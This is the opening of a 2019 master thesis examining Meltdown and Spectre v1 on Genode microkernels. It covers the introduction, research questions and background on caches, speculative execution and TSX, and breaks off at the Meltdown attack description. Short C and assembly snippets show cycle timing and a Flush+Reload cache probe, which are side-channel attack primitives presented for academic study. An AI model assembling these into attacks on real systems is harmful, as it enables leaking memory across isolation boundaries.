Linköping University | Department of Computer and Information Science Master thesis, 30 ECTS | Datateknik 2019 | LIU-IDA/LITH-EX-A--19/045--SE

Examining the Impact of Microarchitectural Attacks on Microkernels – a study of Meltdown and Spectre

Gunnar Grimsdal Patrik Lundgren

Supervisor : Felipe Boeira Examiner : Mikael Asplund

External supervisor : Christian Vestlund

Linköpings universitet, SE–581 83 Linköping, +46 13 28 10 00, www.liu.se


Copyright

The publishers will keep this document online on the Internet - or its possible replacement - for a period of 25 years starting from the date of publication barring exceptional circumstances. The online availability of the document implies permanent permission for anyone to read, to download, or to print out single copies for his/hers own use and to use it unchanged for non- commercial research and educational purpose. Subsequent transfers of copyright cannot revoke this permission. All other uses of the document are conditional upon the consent of the copyright owner. The publisher has taken technical and administrative measures to assure authenticity, security and accessibility. According to intellectual property law the author has the right to be mentioned when his/her work is accessed as described above and to be protected against infringement. For additional information about the Linköping University Electronic Press and its procedures for publication and for assurance of document integrity, please refer to its www home : http://www.ep.liu.se/.

© Gunnar Grimsdal, Patrik Lundgren

Abstract

Most of today's widely used operating systems are based on a monolithic design and have a very large code size, which complicates verification of security-critical applications. One approach to solving this problem is to use a microkernel, i.e., a small kernel which only implements the bare necessities. A system using a microkernel can be constructed using the operating-system framework Genode, which provides security features and a strict hierarchy. However, these systems may still be vulnerable to microarchitectural attacks, which can bypass an operating system's security features by exploiting vulnerable hardware. This thesis aims to investigate whether microkernels are vulnerable to the microarchitectural attacks Meltdown and Spectre version 1 in the context of Genode. Furthermore, the thesis analyzes the execution cost of mitigating Spectre version 1 in Genode's remote procedure calls. The results show that Genode does not mitigate the Meltdown attack, which we confirm by demonstrating a working Meltdown attack on Genode+Linux. We also determine that microkernels are vulnerable to Spectre by demonstrating a working attack against two microkernels. However, we show that the cost of mitigating this Spectre attack is small, with a slowdown of 3% for remote procedure calls in Genode.

Acknowledgments

We would like to thank all the people at Sectra Communications AB for welcoming us and assisting with our thesis. We would like to give special thanks to our supervisor Christian Vestlund for his engagement and his knowledge of side-channel attacks. Additionally, we would like to thank Jonathan Jogenfors for his useful insights on writing a thesis. From Linköping University, we would like to thank our examiner Mikael Asplund for his enthusiasm and academic input and Felipe Boeira for his feedback and support in writing our thesis.

Contents

Abstract iii

Acknowledgments iv

Contents v

List of Figures viii

List of Tables x

1 Introduction 2
1.1 Microkernel ...... 2
1.2 Genode ...... 3
1.3 Meltdown and Spectre ...... 3
1.4 Motivation ...... 4
1.5 Aim ...... 4
1.6 Research Questions ...... 4
1.7 Delimitations ...... 5
1.8 Thesis Outline ...... 5

2 Background 6
2.1 CPU Optimizations ...... 6
2.1.1 Cache ...... 6
2.1.2 Data Prefetching ...... 7
2.1.3 Out-of-Order Execution ...... 7
2.1.4 Speculative Execution ...... 7
2.1.5 Intel TSX ...... 7
2.2 Timing Channels ...... 7
2.2.1 Cache-Based Timing Channels ...... 8
2.2.2 Accurately Measuring Time ...... 8
2.3 Flush+Reload ...... 9
2.3.1 Shared Memory ...... 9
2.3.2 Preventing Data Prefetching ...... 10
2.4 Meltdown ...... 10
2.4.1 Virtual Address Space ...... 10
2.4.2 Meltdown Attack Description ...... 11
2.4.3 Proof-Of-Concept Implementation ...... 11
2.4.4 Mitigations ...... 12
2.4.5 Meltdown on Genode ...... 12
2.5 Spectre ...... 12
2.5.1 Spectre V1 Attack Description ...... 13
2.5.2 Spectre V1 Mitigations ...... 13
2.5.2.1 Preventing Speculative Execution ...... 13

2.5.2.2 Index Bitmasking ...... 14
2.6 Performance ...... 15
2.6.1 Microkernel Performance ...... 15
2.6.2 IPC Performance ...... 15
2.7 Related Work ...... 15
2.7.1 Genode ...... 16
2.7.2 Side Channels ...... 16
2.7.3 Microarchitectural Attacks ...... 16
2.7.4 Linux Control Groups ...... 17
2.7.5 Security by Virtualization ...... 17

3 Method 18
3.1 Setting up System Under Test ...... 18
3.1.1 Using x86 Intrinsics ...... 18
3.1.2 Obtaining Output ...... 19
3.1.3 Building and Running on Nova ...... 20
3.1.4 Building and Running on Okl4 ...... 20
3.1.5 Building and Running on Linux ...... 21
3.1.6 Measuring Throughput ...... 21
3.2 Implementing the Flush+Reload Channel ...... 22
3.2.1 Measuring Cache Hits ...... 22
3.2.2 Preventing Data Prefetching ...... 23
3.2.3 Adapting the Channel to Targeted Kernels ...... 24
3.2.4 Measuring Throughput of the Covert Channel ...... 25
3.2.5 Reducing Noise ...... 25
3.3 Implementing Meltdown ...... 26
3.3.1 Recovering from Segmentation Faults ...... 26
3.3.2 Disabling Mitigations ...... 26
3.3.3 Choosing a Target Address ...... 26
3.4 Implementing Spectre ...... 27
3.4.1 Ensuring Speculative Execution ...... 28
3.4.2 Configure Variables for Spectre ...... 28
3.4.3 Measuring Throughput ...... 29
3.4.4 Measuring Impact of Mitigations ...... 29

4 Results 30
4.1 Flush+Reload ...... 30
4.1.1 Choosing Cache-Hit Thresholds ...... 30
4.1.2 Preventing Data Prefetching ...... 31
4.1.3 Measuring Throughput ...... 33
4.1.4 Reducing Noise ...... 33
4.2 Meltdown ...... 37
4.2.1 Reading a Victim's Secret ...... 37
4.2.2 Reading the Linux Version Banner ...... 37
4.3 Spectre ...... 37
4.3.1 Training the Branch Predictor ...... 37
4.3.2 Ensuring Speculative Execution ...... 39
4.3.3 Attack Throughput ...... 39
4.3.4 Mitigations ...... 39
4.3.5 Error Sources ...... 41

5 Discussion 43
5.1 Flush+Reload ...... 43

5.1.1 Cache-Hit Measurements ...... 43
5.1.2 Choosing Cache-Hit Thresholds ...... 44
5.1.3 Preventing Data Prefetching ...... 44
5.1.4 Inaccuracies in Throughput Measurements ...... 44
5.1.5 Reducing Noise ...... 45
5.2 Meltdown ...... 45
5.2.1 Alternative Segmentation Fault Recovery ...... 45
5.2.2 Turning off Mitigations ...... 45
5.2.3 The Difficulties of Reading Secrets ...... 45
5.2.4 Reliability Issues with Meltdown ...... 46
5.3 Spectre ...... 46
5.3.1 Training the Branch Predictor ...... 46
5.3.2 Criticism of Heuristic Cache Flush ...... 46
5.3.3 Throughput Anomalies ...... 46
5.3.4 Small Impact on Performance ...... 47
5.4 Source criticism ...... 47
5.5 The Work in a Wider Context ...... 48
5.5.1 Can OS Memory Separation be Trusted? ...... 48
5.5.2 Can Hardware Separation be Trusted? ...... 48
5.5.3 Consequences for Security and Safety Critical Systems ...... 48
5.5.4 Impact of This Work ...... 49

6 Conclusion 50
6.1 Future Work ...... 51

Bibliography 52

List of Figures

2.1 A model of virtual memory composition. ...... 11

3.1 Overview of Genode's Hierarchy ...... 19
3.2 The communication setup to retrieve output from the tested system. ...... 19
3.3 A receiver observing access times for a cache hit on a Flush+Reload channel, built on a contiguous padded array. ...... 22
3.4 A model of memory access times for different memory levels. ...... 23
3.5 A sequence diagram for measurements of the LLC access times. ...... 23
3.6 Leak Array Layout ...... 24
3.7 A sequence diagram of Flush+Reload communication between two processes. ...... 25
3.8 A sequence diagram of Meltdown using Intel TSX and Flush+Reload. ...... 26
3.9 A sequence diagram of Spectre using Flush+Reload. ...... 27

4.1 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Okl4. ...... 31
4.2 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Nova. ...... 31
4.3 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Linux. ...... 32
4.4 Time to access values in a pseudo-randomized or sequential pattern using 256 bytes as internal padding on Okl4. ...... 32
4.5 Time to access values in a pseudo-randomized or sequential pattern using 4096 bytes as internal padding on Okl4. ...... 33
4.6 Throughput from reading 2048 bytes from another process in Genode using Meltdown on Genode+Linux. ...... 37
4.7 Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Okl4. ...... 38
4.8 Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Nova. ...... 38
4.9 Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Linux. ...... 38
4.10 Throughput for Spectre V1 using different choices of Hs for heuristically flushing the cache. ...... 39
4.11 Measurements of execution time of RPC on Genode+Okl4 using Spectre V1 mitigations. ...... 40
4.12 Measurements of execution time of RPC on Genode+Nova using Spectre V1 mitigations. ...... 40
4.13 Measurements of execution time of RPC on Genode+Linux using Spectre V1 mitigations. ...... 41
4.14 Percentage of correctly read bytes from reading 2048 bytes and compiling the application between each test. ...... 42

4.15 Percentage of correctly read bytes from reading 2048 bytes from running the same binary multiple times on Linux. ...... 42

List of Tables

4.1 The Cache-hit thresholds in CPU cycles for each kernel. ...... 31
4.2 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Okl4 for different internal padding sizes. ...... 31
4.3 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Nova for different internal padding sizes. ...... 32
4.4 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Linux for different internal padding sizes. ...... 32
4.5 Reading 2048 bytes with Flush+Reload within one process. ...... 33
4.6 Reading 2048 bytes with Flush+Reload between two processes. ...... 34
4.7 Reading 2048 bytes using Flush+Reload within a process on Genode+Okl4 with different number of attempts. ...... 34
4.8 Reading 2048 bytes using Flush+Reload within a process on Genode+Nova with different number of attempts. ...... 34
4.9 Reading 2048 bytes using Flush+Reload within a process on Genode+Linux with different number of attempts. ...... 35
4.10 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Okl4 with different number of attempts. ...... 35
4.11 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Nova with different number of attempts. ...... 35
4.12 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Linux with different number of attempts. ...... 36
4.13 Result of reading 2048 bytes with Spectre V1 with chosen parameters. ...... 39
4.14 Mean relative slowdown and standard deviation after applied lfence mitigation. ...... 41
4.15 Mean relative slowdown and standard deviation after applied bitmask mitigation. ...... 41


1 Introduction

Most of today's widely used Operating Systems (OSs) like Windows, GNU/Linux and OSX1 are based on a monolithic design, meaning that all parts of the operating system act as a trusted part of the kernel. In such a design, drivers, file systems and Inter-Process Communication (IPC) are all handled as part of the kernel and trusted as such. Consequently, a flaw in any of these trusted components may compromise the entire kernel. Moreover, OSs based on a monolithic design, like Windows and GNU/Linux, are difficult to verify due to their size. The Linux kernel contains millions of lines of source code and is frequently updated [6]. While there have been efforts to formally verify the correctness of software against a specification, this has only been performed on a much smaller scale. The Sel4 kernel, with its 9300 lines of code [23], has been formally verified against its specification at a cost of roughly 20 lines of verification code per line of source code and 22 person-years of work2. Microsoft researchers Hawblitzel et al. have in the Ironclad project [16], instead of focusing on application verification, used automated tools to verify security-critical libraries. The Ironclad project achieved a less costly verification at 4.8 lines of verification code per line of source code and 3 person-years of work. However, the fact remains that formal verification is very costly, and OSs containing millions of lines of code are far out of reach with today's tools, even at a roughly five-fold increase in development cost.

1.1 Microkernel

One approach to mitigating this size issue is to replace the monolithic kernel with a microkernel. A microkernel is a small kernel, typically containing only around 10,000 lines of code3. This small size stems from one of the leading design goals of a microkernel, which is to run most services in user space and to provide only essential functionality in kernel space. This type of design reduces the amount of privileged code and may reduce the risk that kernel-level services are compromised. It also allows for the possibility of disabling unneeded services, which is important as it may reduce the attack surface of the kernel.

1Operating System Market Share Worldwide. en. May 2019. URL: http://gs.statcounter.com/os-market- share (visited on 2019-05-06). 2DATA61. The seL4 verification project. Jan. 2019. URL: http://ts.data61.csiro.au/projects/seL4- verification/ (visited on 2019-01-07). 3OSDev. Microkernel. 2019. URL: https://wiki.osdev.org/Microkernel (visited on 2019-01-03).


1.2 Genode

The small amount of code in microkernels may result in a lack of some useful functionality such as protocol stacks and network drivers. Genode is a framework for building secure OSs using a microkernel and tries to address the issue of missing OS components [7]. Genode provides more than 100 ready-to-use components such as network drivers and protocol stacks. In Genode, as many components as possible are executed in user space. One key feature of Genode is that each component is assigned a budget by its parent process for resources such as CPU time, memory and file-system access. Genode has been developed to run on multiple kernels, for example Nova, Okl4 and Linux. The Nova kernel, which is a microhypervisor, is a research project aimed at secure virtualization. Similar to a microkernel, it provides essential functionality for virtualization like communication, scheduling and resource management4. Okl4 is an open-source microkernel based on the L4 microkernel. It can be used as a hypervisor or as a real-time OS and has been used in practice by General Dynamics5. Genode tries to achieve a secure OS design by carefully isolating components using hardware and software separation [7]. Microarchitectural attacks have in some ways compromised software and hardware separation. These attacks exploit the microarchitectural state of the CPU, e.g., caches or the Translation Lookaside Buffer (TLB). Such attacks may break software which depends on a correct hardware implementation. This class of attacks has had recent success in the form of Meltdown and Spectre [31, 24].

1.3 Meltdown and Spectre

Meltdown is a microarchitectural attack which exploits the fact that some modern CPUs may execute instructions out of order [31]. Specifically, Meltdown can read memory from an addressable memory space which it should not be able to read from. Lipp et al. [31] used a Meltdown exploit to read memory from the kernel and other user processes in Linux. This was possible as the Linux kernel's memory was mapped into the address space of each user process. Genode's founder Feske has stated that some in-kernel data structures in Genode are likely vulnerable to the Meltdown attack6. Spectre relies on the fact that some modern CPUs may speculatively execute instructions [24]. There are different versions of the Spectre attack [42, 24, 33]; we will be looking at Spectre version 1, which exploits speculative execution to bypass boundary checks. An attacker could use this attack to execute code which bypasses a boundary check and leaks information to the attacker. Both Meltdown and Spectre rely on an attacker being able to transmit gathered data to and from the cache. Flush+Reload is a Side-Channel Attack (SCA) which abuses the time difference between fetching uncached and cached data [48]. This channel can be used in the context of Meltdown and Spectre to first read kernel memory into the cache by exploiting their respective CPU optimizations. If the address which is cached is carefully crafted, the time it takes a process to access this address can be measured to retrieve information. SCAs extract information from another system or user by abusing some aspect of the system which is not supposed to transmit information. A side channel can also be used as a covert channel, i.e., a channel in which two colluding actors communicate via the side channel.

4NOVAMicrohypervisor. URL: http://hypervisor.org/ (visited on 2019-03-19). 5General Dynamics. Hypervisor Products - General Dynamics Mission Systems. en. 2018. URL: https : / / gdmissionsystems.com/en/products/secure-mobile/hypervisor (visited on 2019-03-22). 6N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/ mailman/message/36178974/ (visited on 2019-01-16).


1.4 Motivation

Software separation may work as a mitigation against some microarchitectural attacks. Lipp et al. described how the Kernel Address Isolation to have Side Channels Efficiently Removed (KAISER) patch mitigates Meltdown [31]. KAISER removes the kernel map from user space and therefore removes Meltdown's ability to access kernel memory7. However, the methods used to mitigate Meltdown significantly impact performance [36]. There have been efforts to mitigate the Spectre attack. However, mitigations against Spectre attacks are focused on treating the symptoms of the attack rather than preventing it. This is due to the fact that disabling speculative execution is usually not supported and that any CPU performing speculative execution may leak data [33]. Thus, the options to address the problem are either to mitigate the attacks in software or the very expensive option of replacing speculating CPUs with non-speculating ones. The Genode OS framework is interesting from a security standpoint for its strict process separation, its adherence to a minimal kernel and its open-source code. However, it has been suggested by Feske that some information can leak from Genode through the Meltdown attack8. A successful attack may compromise the security guarantees which are the very reason to reach for Genode. Furthermore, Feske states that there have been no efforts to mitigate Spectre attacks. Schmidt et al. [39] demonstrated ways to circumvent security policies for Genode's IPC. Schmidt et al. implemented a covert channel which abused a file system cache in Genode. The covert channel Schmidt et al. created could transfer data at a rate of 2 /s between two user-owned processes. To the best of our knowledge, there has been no previous work demonstrating a violation of Genode's memory separation.

1.5 Aim

This thesis aims to study the impact of microarchitectural attacks on microkernels. In particular, we aim to demonstrate the effectiveness of Meltdown and Spectre on microkernels as well as to measure the performance impact after Spectre version 1 mitigations have been applied.

1.6 Research Questions

1. Can Flush+Reload be used to create a covert channel between two processes in Genode, measured as the throughput of the demonstrated channel? We answer this research question by demonstrating a working Flush+Reload channel between two processes in Genode. We define throughput as the number of successfully transmitted bytes per second.

2. Are Remote Procedure Call (RPC) mechanisms in the microkernels Nova and Okl4 vulnerable to the Spectre Version 1 (Spectre V1) attack, measured as the throughput of the demonstrated attack? We answer this research question by demonstrating a Spectre attack exploiting a victim using a bounds-checked array access. The target implements a vulnerable RPC, which is one of Genode's mechanisms for IPC.

3. Can the Meltdown attack be executed on Genode? We answer this research question by demonstrating that Meltdown can be used to read data from another process.

7J. Corbet. KAISER: hiding the kernel from user space [LWN.net]. Nov. 2017. URL: https://lwn.net/Articles/ 738975/ (visited on 2019-01-22). 8N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/ mailman/message/36178974/ (visited on 2019-01-16).


4. What is the performance impact of different Spectre V1 mitigation alternatives, measured as the relative slowdown of RPC mechanisms? To answer this research question, we apply different mitigations and measure their respective performance impacts for each targeted kernel.

We reproduce Spectre on Genode+Okl4 and Genode+Nova with a throughput of approximately 2 kB/s using Flush+Reload. Furthermore, we demonstrate Meltdown on Genode+Linux by reading memory from a victim process, transmitting up to approximately 9 kB/s. In addition, we show that the performance impact of two different Spectre V1 mitigations on Genode's RPCs is negligible. Consequently, we demonstrate that these microkernels are not secure by design and that Genode does not provide protection against microarchitectural attacks.

1.7 Delimitations

The scope of this thesis is limited to attacking Genode on chosen hardware (Intel Core i5-7500 CPU). There will not be any efforts to compare results on different types of hardware, nor will there be efforts to evaluate kernels which are not supported by Genode.

1.8 Thesis Outline

This thesis begins by introducing the fundamentals of CPU optimizations as well as more detailed information regarding the workings of microarchitectural attacks and performance measurements in Chapter 2. The method used to obtain results is presented in Chapter 3, and the results in Chapter 4. The work in a wider context and the answers to the research questions are presented in Chapter 5 and Chapter 6, respectively.

2 Background

To understand the workings and implications of Meltdown and Spectre, there is a need for a fundamental understanding of CPU optimizations. Thus, this chapter begins by describing the main optimizations which are utilized in the attacks. Furthermore, an understanding of timing channels is needed to understand the tools with which microarchitectural attacks leak information. For this reason, this chapter continues by describing timing channels before moving on to the Meltdown and Spectre attacks.

2.1 CPU Optimizations

Modern CPUs use many kinds of optimizations to reduce execution time, some of which need to be taken into account by a developer, while others seamlessly optimize executing code. Some of these optimizations may have noticeable effects on code execution, often relating to reduced execution time. For this reason, these optimizations are relevant to the use of timing channels.

2.1.1 Cache

The time it takes to access data from DRAM is a bottleneck in modern computers; one memory access to DRAM can take approximately 240 CPU cycles on an Intel Pentium M processor [15]. Modern CPUs therefore also contain faster memory called cache. The cache is often divided into different levels, where the levels closer to the CPU core are faster but smaller than the caches on higher levels [15]. The number of cache levels varies depending on which CPU is used. The cache closest to the core is called the L1 cache, on the next level is the L2 cache, and so on [15]. The highest-level cache is called the Last-Level Cache (LLC) and is often the L2 or L3 cache in Intel CPUs; this cache is shared between multiple cores on multi-core CPUs [48]. The CPU used in this thesis has three cache levels, L1, L2 and the LLC, which can be seen by running the command lscpu in a Linux terminal. Memory accesses which resolve to a cache access are usually referred to as cache hits, whereas memory accesses which do not are referred to as cache misses.


2.1.2 Data Prefetching

Data prefetching is an optimization which speculatively loads data into cache before it is explicitly used. This is done to improve the performance of predictable access patterns, such as sequential access [19].

2.1.3 Out-of-Order Execution

Modern CPUs have an optimization which allows them to execute instructions out of order [19]. Out-of-Order Execution (OOE) allows instructions to be executed simultaneously with, or before, preceding instructions; this is done to minimize the time the CPU is stalled [19]. Listing 2.1 shows an example in which OOE can reduce execution time. Line 1 fetches memory located at ptr, and line 2 cannot be executed while this fetch is in progress. The CPU can, therefore, execute the instruction on line 3 while waiting for the data to be fetched.

Listing 2.1: Example of Out-of-Order Execution
1 mov edx, [ptr] ; Copy data from memory located at ptr to edx
2 add edx, 1     ; Add 1 to edx
3 mov ebx, 1     ; Copy 1 to ebx, may execute before line 2

2.1.4 Speculative Execution

Speculative execution is a technique for reducing the execution time of programs by speculatively executing a branch which has yet to be determined valid [18]. If the branch is determined invalid, the results of the computations are reverted, returning the CPU to its state before the speculative execution [18]. However, speculative execution may alter the microarchitectural state of the processor, including the TLB and caches [18]. The Branch-Prediction Unit (BPU) makes different types of predictions for branches to enable faster execution. For conditional branches, the BPU predicts either a false or true outcome depending on values stored in the Branch-Target Buffer (BTB) [19].

2.1.5 Intel TSX

Some Intel processors support the so-called Intel Transactional Synchronization Extension (TSX). This extension allows for transactional execution of code under some restrictions [20]. At its core, Intel TSX allows for executing some instructions as a transaction, either committing the result of these instructions or aborting, subsequently reverting changes to the CPU's state from the computations. Similarly to speculative execution, Intel TSX does not revert the microarchitectural state [20] and may thus leave information in the cache from an aborted transaction.
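As an illustration of how such a transaction behaves, the sketch below uses the RTM intrinsics from immintrin.h. It is a minimal example assuming a CPU with TSX/RTM support; try_transaction() and shared_counter are illustrative names, not code from any of the cited works.

#include <immintrin.h>   /* _xbegin, _xend, _XBEGIN_STARTED (requires RTM) */

/* Minimal sketch: run a small block of code as a transaction. If the
 * transaction aborts, the architectural state (registers, memory) is rolled
 * back, but data loaded during the transaction may remain in the cache. */
static int try_transaction(volatile int *shared_counter)
{
    unsigned status = _xbegin();
    if (status == _XBEGIN_STARTED) {
        *shared_counter += 1;   /* executed transactionally */
        _xend();                /* commit the transaction */
        return 1;
    }
    /* Abort path: the increment never became visible, yet the cache line
     * holding *shared_counter may now be cached. */
    return 0;
}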

2.2 Timing Channels

Lampson wrote a paper defining covert channels in 1973; his definition was:

”Covert channels, i.e. those not intended for information transfer at all, such as the service program’s effect on the system load.” [27, p. 4]

Hence, a covert channel is a communication channel which abuses a resource or a component which is not intended for communication. Side channels are unintended communication channels which depend on the physical implementation of a system rather than a theoretical weakness of it [11]. We distinguish side channels from covert channels in that a covert channel is used between two or more cooperating agents, while a side channel is used by an attacker to spy on a victim.


Timing channels are a subset of SCAs in which an attacker examines the time a certain task takes. Brumley and Boneh [2] executed a timing attack against a server running Apache with OpenSSL. Brumley and Boneh could extract the RSA key from the server by executing malformed SSL handshakes multiple times, measuring the server's response time to retrieve information about the computations.

2.2.1 Cache-Based Timing Channels

One category of these timing-channel attacks is cache-based channels; these attacks utilize the fact that the access time for a memory location varies depending on whether its value is stored in the cache or not [8]. Cache-based channels include Prime+Probe, Flush+Reload and Evict+Time [8, 48].

2.2.2 Accurately Measuring Time

A reliable way to measure the time it takes for a value to be accessed is a necessity for implementing a cache-based timing channel. Paoloni [34] has published guidelines for benchmarking code execution on Intel 32- and 64-bit architectures. Paoloni describes the use of the Time-Stamp Counter (TSC), which counts CPU cycles, for measuring time. Intel 32- and 64-bit architectures come with two instructions for reading the TSC: rdtsc and rdtscp. Paoloni recommends measurement using the timer in Listing 2.2, which uses the instructions rdtsc, rdtscp and cpuid to prevent OOE. Yarom and Falkner noted that use of the instruction cpuid may not be desirable for cross Virtual Machine (VM) channels, as the instruction may be emulated by the Virtual Machine Monitor (VMM) [48]. In place of the cpuid instruction they instead use a load fence, which stalls the CPU until all previous loads have resolved. The rdtsc instruction reads the TSC into the CPU registers edx and eax. Similarly, rdtscp reads the TSC into these registers but additionally waits for previous instructions to have executed [34]. Paoloni also suggests an alternative method, presented in Listing 2.3, for when the rdtscp instruction is not available.

Listing 2.2: Timer Recommended by Intel
cpuid          ; Prevent OOE for previous instructions
rdtsc          ; Read TSC into edx, eax
mov var1, edx  ; Store TSC in var1 and var2
mov var2, eax
; Call measured function here
rdtscp         ; Serialize previous instructions and read TSC
mov var3, edx  ; Store second TSC in var3 and var4
mov var4, eax
cpuid          ; Prevent OOE for following instructions


Listing 2.3: Alternative Timer Recommended by Intel
cpuid          ; Prevent OOE for previous instructions
rdtsc          ; Read TSC into edx, eax
mov var1, edx  ; Store TSC in var1 and var2
mov var2, eax
; Call measured function here
cpuid          ; Serialize previous instructions
rdtsc          ; Read TSC
mov var3, edx  ; Store second TSC in var3 and var4
mov var4, eax
cpuid          ; Prevent OOE for following instructions
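In a C implementation, the same measurement can be expressed with compiler intrinsics instead of hand-written assembly. The sketch below is a minimal example assuming GCC or Clang on x86-64; time_access() and its argument are illustrative names rather than code from the thesis, and it uses lfence for serialization as suggested by Yarom and Falkner.

#include <stdint.h>
#include <x86intrin.h>   /* __rdtsc, __rdtscp, _mm_lfence */

/* Measure, in TSC cycles, how long one access to *addr takes. */
static inline uint64_t time_access(volatile uint8_t *addr)
{
    unsigned aux;
    _mm_lfence();                   /* wait for earlier loads to resolve */
    uint64_t start = __rdtsc();     /* first TSC read */
    _mm_lfence();                   /* keep the access from starting early */
    (void)*addr;                    /* the memory access being measured */
    uint64_t end = __rdtscp(&aux);  /* second TSC read, after the access */
    _mm_lfence();
    return end - start;
}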

2.3 Flush+Reload

Flush+Reload is a cache-based timing channel designed by Yarom and Falkner [48] which exploits the timing of the LLC. Therefore, Flush+Reload does not require the attacker and the victim to run their respective processes on the same CPU core. Flush+Reload relies on sharing pages with a victim process, as this allows Flush+Reload to control the caching of these shared pages [48]. The attack Yarom and Falkner developed works by evicting a specific memory line using clflush and subsequently letting the victim execute. After the victim has executed, the attacker can check whether the evicted line is once again in the cache. Checking whether the value is in the cache is done by defining a machine-specific time threshold below which accesses are considered cache hits. Yarom and Falkner profiled cache misses using clflush to define the threshold. Zhou et al. [50] presented a method to choose the threshold for Flush+Reload and concluded that the threshold should be below, but close to, the lower boundary of DRAM access times. Yarom and Falkner note that some CPU optimizations, e.g. speculative execution or data prefetching, may result in false positives. Consequently, it is desirable to have strategies to filter these false positives; however, Yarom and Falkner do not suggest methods for doing so.
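To make the flush and reload steps concrete, the following sketch shows one probe round on a shared address. It is a simplified illustration, not the implementation used in this thesis; CACHE_HIT_THRESHOLD is a placeholder that must be calibrated per machine (see Chapter 4), and the victim is assumed to run between the flush and the reload.

#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, _mm_lfence, __rdtsc, __rdtscp */

#define CACHE_HIT_THRESHOLD 100      /* placeholder, machine specific */

/* Returns 1 if the victim touched the shared line since the last flush. */
static int flush_reload_probe(volatile uint8_t *shared)
{
    _mm_clflush((const void *)shared);   /* Flush: evict the monitored line */
    _mm_mfence();

    /* ... let the victim execute here ... */

    unsigned aux;
    uint64_t start = __rdtsc();          /* Reload: time one access */
    _mm_lfence();
    (void)*shared;
    uint64_t delta = __rdtscp(&aux) - start;
    return delta < CACHE_HIT_THRESHOLD;  /* fast access => cache hit */
}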

2.3.1 Shared Memory

One requirement for Flush+Reload is the availability of shared memory between the attacker and the victim. Multiple processes can have access to a shared physical memory space in modern OSs1. One reason for using shared memory is to optimize memory usage when multiple processes are using the same library [31]. The OS may load a library once into physical memory and reference this memory with different virtual memory addresses. Hence, instead of every process loading the library into its own user space, the library is only loaded once and thereafter shared by multiple processes. User processes can also use shared memory for IPC in some OSs [31]. This mechanism for optimizing the use of shared libraries has been used by Yarom and Falkner [48] to extract encryption keys via a Flush+Reload side channel. Genode has a strict separation between its processes and should, therefore, not optimize memory usage by sharing memory [7]. However, a Flush+Reload channel may still be used between two processes sharing memory for IPC2.

1M. T. Jones. Anatomy of Linux dynamic libraries. 2008. URL: https://www.ibm.com/developerworks/ linux/library/l-dynamic-libraries/ (visited on 2019-01-17). 2N. Feske. Side-channel attacks(Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/ mailman/message/36178974/ (visited on 2019-01-16).


2.3.2 Preventing Data Prefetching

Several techniques have been shown to be effective at preventing data prefetching. Reads in a randomized order or via a random-order linked list are techniques which have been suggested by Liu et al. [32] to prevent data prefetching. Kocher et al. [24], although it is not explicitly stated, utilize a form of strided reads in their POC, thus preventing data prefetching. We will denote the form of strided reads used by Kocher et al. as Strided Read Generators (SRGs), which can be constructed as

$x_{s_i} = (a \cdot i + b) \bmod m$, where $a \equiv 1 \pmod{p}$ for all prime factors $p$ of $m$.

For example, choosing $a$, $b$ and $m$ as

$a = 127$, $b = 0$, $m = 256$

gives a sequence $x_{s_i} \in \{0, 127, 1, 128\}$ from a sequence $i \in \{0, 1, 2, 3\}$.
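A minimal sketch of how such a generator can be used to touch a probe array in a non-sequential order is shown below. The parameters a, b and m follow the form above; the array layout and the STRIDE padding are assumptions made for illustration, not the exact code used in the POC.

#include <stddef.h>
#include <stdint.h>

#define STRIDE 4096   /* per-entry padding, e.g. one page (assumption) */

/* Iterate over m probe entries in SRG order so that the hardware
 * prefetcher cannot predict the next access. */
static void srg_iterate(volatile uint8_t *probe, size_t a, size_t b, size_t m)
{
    for (size_t i = 0; i < m; i++) {
        size_t idx = (a * i + b) % m;   /* strided, non-sequential index */
        (void)probe[idx * STRIDE];      /* touch entry idx */
    }
}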

2.4 Meltdown

Meltdown is a microarchitectural attack leveraging OOE in some modern processors to leak memory via a cache covert channel. OOE is used to modify the contents of the cache; subsequently, the altered cache is read via a covert channel [31]. Lipp et al. [31] describe two practical Meltdown attacks. The first attack showed how an attacker could read stored passwords from another process running on the same machine [31]. The second attack demonstrated how an attacker could exploit a system to dump the memory of another process, even with Kernel Address Space Layout Randomization (KASLR) active [31]. KASLR is a mechanism which randomizes the kernel-space memory layout at boot time [9].

2.4.1 Virtual Address Space

The process executing the Meltdown attack is required to have a virtual memory address corresponding to the physical memory address where the targeted data is located. Virtual memory is designed to isolate processes from each other. Virtual memory also acts as an abstraction from hardware and physical memory, exposing a conceptually infinite space of memory [15, p.38]. The virtual address is split into parts, one indexing a page directory entry and the other an offset within that page [15]. Multiple page directory entries may resolve to the same physical memory page. Shared memory is commonly implemented in this way, i.e., by mapping multiple virtual addresses to the same physical memory address [15, p.38]. Figure 2.1 shows the virtual memory map of a process running on 64-bit Linux. The process's memory space, i.e. user space, is located at the lower address range and the kernel at the highest address range. In between user and kernel space is unused address space. The layout of the kernel space is the same for all user processes in Linux. This is done to remove the need of swapping the Memory-Management Unit (MMU) state when switching to kernel mode, which is a costly operation3.

3J. Corbet. KAISER: hiding the kernel from user space [LWN.net]. Nov. 2017. URL: https://lwn.net/Articles/ 738975/ (visited on 2019-01-22).


Figure 2.1: A model of virtual memory composition: user space at the low end of the address range (0x0000000000000000 to 0x0000008000000000), followed by unused space, and kernel space at the high end (0xFFFFFF8000000000 to 0xFFFFFFFFFFFFFFFF).

2.4.2 Meltdown Attack Description

